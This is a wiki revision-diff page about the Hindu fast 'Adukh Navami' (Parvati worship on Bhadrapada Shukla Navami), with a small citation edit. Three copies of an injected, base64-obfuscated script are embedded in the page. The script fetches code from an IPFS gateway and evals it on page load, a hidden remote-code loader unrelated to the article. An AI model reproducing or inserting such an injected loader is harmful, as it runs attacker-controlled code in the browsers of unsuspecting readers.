Difference between revisions of "अदुःख नवमी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - ")</ref" to "</ref")
 
Line 1: Line 1:
 
{{menu}}
 
{{menu}}
 
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
 
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
*भाद्रपद शुक्ल की नवमीं को [[पार्वती]] जी की पुजा की जाती है।<ref>व्रतराज (332–337; स्कन्द से उद्धरण)</ref>
+
*भाद्रपद शुक्ल की नवमीं को [[पार्वती]] जी की पुजा की जाती है।<ref>व्रतराज (332–337; स्कन्द से उद्धरण</ref>
 
*यह व्रत सब के लिए, किन्तु विशेषतः, नारियों के लिए होता है।
 
*यह व्रत सब के लिए, किन्तु विशेषतः, नारियों के लिए होता है।
 
*[[पश्चिम बंगाल|बंगाल]] में इसे स्त्रियाँ अवैधव्य के लिए करती हैं।
 
*[[पश्चिम बंगाल|बंगाल]] में इसे स्त्रियाँ अवैधव्य के लिए करती हैं।

Latest revision as of 12:36, 27 July 2011

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • bhadrapad shukl ki navamian ko parvati ji ki puja ki jati hai.[1]
  • yah vrat sab ke lie, kintu visheshatah, nariyoan ke lie hota hai.
  • bangal mean ise striyaan avaidhavy ke lie karati haian.

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

  1. vrataraj (332–337; skand se uddharan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>